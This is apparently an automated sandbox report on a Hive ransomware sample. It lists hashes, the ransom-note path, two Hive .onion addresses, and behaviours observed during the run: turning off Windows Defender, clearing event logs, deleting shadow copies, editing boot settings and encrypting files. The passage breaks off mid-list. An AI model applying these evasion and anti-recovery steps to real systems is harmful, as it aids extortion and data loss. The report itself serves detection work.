Analysis
-
max time kernel
149s -
max time network
128s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
13-01-2022 10:14
Static task
static1
Behavioral task
behavioral1
Sample
9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe
Resource
win7-en-20211208
General
-
Target
9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe
-
Size
2.7MB
-
MD5
9be36e26502078b2ce42beb735e96673
-
SHA1
d972bec085901c3257a3df2ef02e9555c57d9b9a
-
SHA256
9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c
-
SHA512
7ad070596f29d7e10adfc271a1c2ae1dab9aefd08c3788834135a4bbdce456d0980dd8b5c47aef14968eb9cc68a992cc94ba3c0c12aac4ff476804e9943817df
Malware Config
Extracted
C:\Program Files\7-Zip\6pZZ_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
pid Process 3524 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 1900 bcdedit.exe 3504 bcdedit.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\Microsoft Office\root\Office16\MSIPC\6pZZ_HOW_TO_DECRYPT.txt 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\7260_32x32x32.png 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.targetsize-32_altform-unplated.png 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\xboxservices.config 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_ConsumerSub_Bypass30-ppd.xrm-ms.el0PueNr8-qBMaf7BDnyErcFVkdtt4mWmo12YshKy2T_GN4KSAVDUb80.eeyee 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-24_altform-unplated.png 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files (x86)\Common Files\System\msadc\fr-FR\msdaremr.dll.mui.el0PueNr8-qBMaf7BDnyErcFVkdtt4mWmo12YshKy2T_VRijLTd8mkg0.eeyee 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsStore_11701.1001.87.0_neutral_split.scale-100_8wekyb3d8bbwe\resources.pri 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ru-ru\ui-strings.js.el0PueNr8-qBMaf7BDnyErcFVkdtt4mWmo12YshKy2T_1KhevmjJ2Cw0.eeyee 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ja-jp\ui-strings.js.el0PueNr8-qBMaf7BDnyErcFVkdtt4mWmo12YshKy2T_x4kWlYVbM8Y0.eeyee 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxSpeechToTextOverlay_1.14.2002.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxManifest.xml 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProDemoR_BypassTrial180-ppd.xrm-ms.el0PueNr8-qBMaf7BDnyErcFVkdtt4mWmo12YshKy2T_Yv_w5yn9BBM0.eeyee 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Awards\tripeaks\Peak_Jumper_.png 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_2017.203.236.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui_3.106.0.v20140812-1751.jar.el0PueNr8-qBMaf7BDnyErcFVkdtt4mWmo12YshKy2T_NhiE4JNQSdI0.eeyee 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\7656_20x20x32.png 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files (x86)\Common Files\System\ado\msado60.tlb 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files (x86)\Common Files\System\ja-JP\wab32res.dll.mui 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files\7-Zip\7zCon.sfx.el0PueNr8-qBMaf7BDnyErcFVkdtt4mWmo12YshKy2T_R3aUOhDI0hA0.eeyee 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Corbel.xml.el0PueNr8-qBMaf7BDnyErcFVkdtt4mWmo12YshKy2T_9O24sbH-ny40.eeyee 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\warning_2x.png.el0PueNr8-qBMaf7BDnyErcFVkdtt4mWmo12YshKy2T_MIrPGEwIn5E0.eeyee 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\hr-hr\6pZZ_HOW_TO_DECRYPT.txt 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\OutlookVL_KMS_Client-ul-oob.xrm-ms.el0PueNr8-qBMaf7BDnyErcFVkdtt4mWmo12YshKy2T_JAGtPzF3KeA0.eeyee 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsSoundRecorder_10.1702.301.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\VoiceRecorderLargeTile.contrast-white_scale-125.png 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\4613_32x32x32.png 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\GenericMailBadge.scale-200.png 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\Close2x.png.el0PueNr8-qBMaf7BDnyErcFVkdtt4mWmo12YshKy2T_lk4qZs6Ih480.eeyee 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\sv-se\ui-strings.js.el0PueNr8-qBMaf7BDnyErcFVkdtt4mWmo12YshKy2T_LtvdhNbC9gg0.eeyee 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\es-es\6pZZ_HOW_TO_DECRYPT.txt 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-180_8wekyb3d8bbwe\Assets\Office\NewScene.scale-180.png 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\Office\BooleanIntersect.scale-100.png 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe\Assets\GetStartedSmallTile.scale-100_contrast-black.png 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\small\yes.png 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\io_60x42.png 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\css\main-selector.css.el0PueNr8-qBMaf7BDnyErcFVkdtt4mWmo12YshKy2T_UdAIZ4TUuU80.eeyee 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files (x86)\Common Files\System\Ole DB\ja-JP\msdasqlr.dll.mui.el0PueNr8-qBMaf7BDnyErcFVkdtt4mWmo12YshKy2T_uiCzWVthXMc0.eeyee 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\tr-tr\6pZZ_HOW_TO_DECRYPT.txt 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Sticker_Kiss.png 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_1.4.101.0_x64__8wekyb3d8bbwe\Assets\LockScreenLogo.scale-200.png 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\6440_48x48x32.png 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA7.1\1033\VBLR6.CHM.el0PueNr8-qBMaf7BDnyErcFVkdtt4mWmo12YshKy2T_1KE3OVPgM5Q0.eeyee 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\SharpDXEngine\Rendering\Shaders\Builtin\HLSL\ConstantsPerObjectLighted.fx 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.OneConnect_2.1701.277.0_x64__8wekyb3d8bbwe\Assets\contrast-black\OneConnectAppList.targetsize-20.png 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.OneConnect_2.1701.277.0_x64__8wekyb3d8bbwe\Assets\contrast-white\OneConnectStoreLogo.scale-200.png 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\lt_60x42.png 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.StorePurchaseApp_1.0.454.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations.nl_ja_4.4.0.v20140623020002.jar.el0PueNr8-qBMaf7BDnyErcFVkdtt4mWmo12YshKy2T_dw4SwMlp9JM0.eeyee 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\6pZZ_HOW_TO_DECRYPT.txt 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_1.1702.21039.0_x64__8wekyb3d8bbwe\_Resources\index.txt 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.targetsize-24_altform-unplated_contrast-white.png 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\hr-hr\6pZZ_HOW_TO_DECRYPT.txt 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_basestyle.css.el0PueNr8-qBMaf7BDnyErcFVkdtt4mWmo12YshKy2T_HEG65-qtGRY0.eeyee 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-api-annotations-common.xml.el0PueNr8-qBMaf7BDnyErcFVkdtt4mWmo12YshKy2T_n01ll9XwnfI0.eeyee 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Work\RTL\contrast-black\SmallTile.scale-125.png 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Western\western_12d.png 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\ee_60x42.png 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\al_16x11.png 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\TrafficHub\contrast-white\LargeTile.scale-100.png 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubStoreLogo.scale-100_contrast-white.png 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\THIRDPARTYLICENSEREADME.txt.el0PueNr8-qBMaf7BDnyErcFVkdtt4mWmo12YshKy2T_aQM0v70TXzM0.eeyee 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.configuration_5.5.0.165303.jar.el0PueNr8-qBMaf7BDnyErcFVkdtt4mWmo12YshKy2T_Y37lGUuQb8k0.eeyee 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\diagnostic-command-16.png.el0PueNr8-qBMaf7BDnyErcFVkdtt4mWmo12YshKy2T_Z56HhfQYKdg0.eeyee 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\5601_20x20x32.png 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sortedby_up_18.svg.el0PueNr8-qBMaf7BDnyErcFVkdtt4mWmo12YshKy2T_1MF9uUhGiJc0.eeyee 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1948 vssadmin.exe -
Modifies registry class 3 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP reg.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 2152 notepad.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2588 PING.EXE -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 1300 powershell.exe 1300 powershell.exe 1300 powershell.exe 3012 powershell.exe 3012 powershell.exe 3012 powershell.exe 2648 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe 2648 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeSecurityPrivilege 1896 wevtutil.exe Token: SeBackupPrivilege 1896 wevtutil.exe Token: SeSecurityPrivilege 3812 wevtutil.exe Token: SeBackupPrivilege 3812 wevtutil.exe Token: SeSecurityPrivilege 400 wevtutil.exe Token: SeBackupPrivilege 400 wevtutil.exe Token: SeIncreaseQuotaPrivilege 3888 wmic.exe Token: SeSecurityPrivilege 3888 wmic.exe Token: SeTakeOwnershipPrivilege 3888 wmic.exe Token: SeLoadDriverPrivilege 3888 wmic.exe Token: SeSystemProfilePrivilege 3888 wmic.exe Token: SeSystemtimePrivilege 3888 wmic.exe Token: SeProfSingleProcessPrivilege 3888 wmic.exe Token: SeIncBasePriorityPrivilege 3888 wmic.exe Token: SeCreatePagefilePrivilege 3888 wmic.exe Token: SeBackupPrivilege 3888 wmic.exe Token: SeRestorePrivilege 3888 wmic.exe Token: SeShutdownPrivilege 3888 wmic.exe Token: SeDebugPrivilege 3888 wmic.exe Token: SeSystemEnvironmentPrivilege 3888 wmic.exe Token: SeRemoteShutdownPrivilege 3888 wmic.exe Token: SeUndockPrivilege 3888 wmic.exe Token: SeManageVolumePrivilege 3888 wmic.exe Token: 33 3888 wmic.exe Token: 34 3888 wmic.exe Token: 35 3888 wmic.exe Token: 36 3888 wmic.exe Token: SeIncreaseQuotaPrivilege 2660 wmic.exe Token: SeSecurityPrivilege 2660 wmic.exe Token: SeTakeOwnershipPrivilege 2660 wmic.exe Token: SeLoadDriverPrivilege 2660 wmic.exe Token: SeSystemProfilePrivilege 2660 wmic.exe Token: SeSystemtimePrivilege 2660 wmic.exe Token: SeProfSingleProcessPrivilege 2660 wmic.exe Token: SeIncBasePriorityPrivilege 2660 wmic.exe Token: SeCreatePagefilePrivilege 2660 wmic.exe Token: SeBackupPrivilege 2660 wmic.exe Token: SeRestorePrivilege 2660 wmic.exe Token: SeShutdownPrivilege 2660 wmic.exe Token: SeDebugPrivilege 2660 wmic.exe Token: SeSystemEnvironmentPrivilege 2660 wmic.exe Token: SeRemoteShutdownPrivilege 2660 wmic.exe Token: SeUndockPrivilege 2660 wmic.exe Token: SeManageVolumePrivilege 2660 wmic.exe Token: 33 2660 wmic.exe Token: 34 2660 wmic.exe Token: 35 2660 wmic.exe Token: 36 2660 wmic.exe Token: SeIncreaseQuotaPrivilege 2660 wmic.exe Token: SeSecurityPrivilege 2660 wmic.exe Token: SeTakeOwnershipPrivilege 2660 wmic.exe Token: SeLoadDriverPrivilege 2660 wmic.exe Token: SeSystemProfilePrivilege 2660 wmic.exe Token: SeSystemtimePrivilege 2660 wmic.exe Token: SeProfSingleProcessPrivilege 2660 wmic.exe Token: SeIncBasePriorityPrivilege 2660 wmic.exe Token: SeCreatePagefilePrivilege 2660 wmic.exe Token: SeBackupPrivilege 2660 wmic.exe Token: SeRestorePrivilege 2660 wmic.exe Token: SeShutdownPrivilege 2660 wmic.exe Token: SeDebugPrivilege 2660 wmic.exe Token: SeSystemEnvironmentPrivilege 2660 wmic.exe Token: SeRemoteShutdownPrivilege 2660 wmic.exe Token: SeUndockPrivilege 2660 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2648 wrote to memory of 3468 2648 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe 68 PID 2648 wrote to memory of 3468 2648 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe 68 PID 3468 wrote to memory of 2592 3468 net.exe 70 PID 3468 wrote to memory of 2592 3468 net.exe 70 PID 2648 wrote to memory of 4048 2648 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe 71 PID 2648 wrote to memory of 4048 2648 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe 71 PID 4048 wrote to memory of 3776 4048 net.exe 73 PID 4048 wrote to memory of 3776 4048 net.exe 73 PID 2648 wrote to memory of 1324 2648 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe 74 PID 2648 wrote to memory of 1324 2648 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe 74 PID 1324 wrote to memory of 648 1324 net.exe 76 PID 1324 wrote to memory of 648 1324 net.exe 76 PID 2648 wrote to memory of 896 2648 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe 77 PID 2648 wrote to memory of 896 2648 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe 77 PID 896 wrote to memory of 1416 896 net.exe 79 PID 896 wrote to memory of 1416 896 net.exe 79 PID 2648 wrote to memory of 2328 2648 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe 80 PID 2648 wrote to memory of 2328 2648 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe 80 PID 2328 wrote to memory of 1636 2328 net.exe 82 PID 2328 wrote to memory of 1636 2328 net.exe 82 PID 2648 wrote to memory of 4076 2648 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe 83 PID 2648 wrote to memory of 4076 2648 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe 83 PID 4076 wrote to memory of 4000 4076 net.exe 85 PID 4076 wrote to memory of 4000 4076 net.exe 85 PID 2648 wrote to memory of 2180 2648 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe 86 PID 2648 wrote to memory of 2180 2648 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe 86 PID 2180 wrote to memory of 1060 2180 net.exe 88 PID 2180 wrote to memory of 1060 2180 net.exe 88 PID 2648 wrote to memory of 1408 2648 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe 89 PID 2648 wrote to memory of 1408 2648 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe 89 PID 1408 wrote to memory of 2860 1408 net.exe 91 PID 1408 wrote to memory of 2860 1408 net.exe 91 PID 2648 wrote to memory of 2748 2648 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe 92 PID 2648 wrote to memory of 2748 2648 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe 92 PID 2748 wrote to memory of 392 2748 net.exe 94 PID 2748 wrote to memory of 392 2748 net.exe 94 PID 2648 wrote to memory of 492 2648 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe 95 PID 2648 wrote to memory of 492 2648 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe 95 PID 2648 wrote to memory of 1716 2648 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe 97 PID 2648 wrote to memory of 1716 2648 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe 97 PID 2648 wrote to memory of 3424 2648 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe 99 PID 2648 wrote to memory of 3424 2648 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe 99 PID 2648 wrote to memory of 1120 2648 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe 101 PID 2648 wrote to memory of 1120 2648 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe 101 PID 2648 wrote to memory of 3864 2648 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe 103 PID 2648 wrote to memory of 3864 2648 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe 103 PID 2648 wrote to memory of 1160 2648 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe 105 PID 2648 wrote to memory of 1160 2648 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe 105 PID 2648 wrote to memory of 1444 2648 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe 107 PID 2648 wrote to memory of 1444 2648 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe 107 PID 2648 wrote to memory of 388 2648 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe 109 PID 2648 wrote to memory of 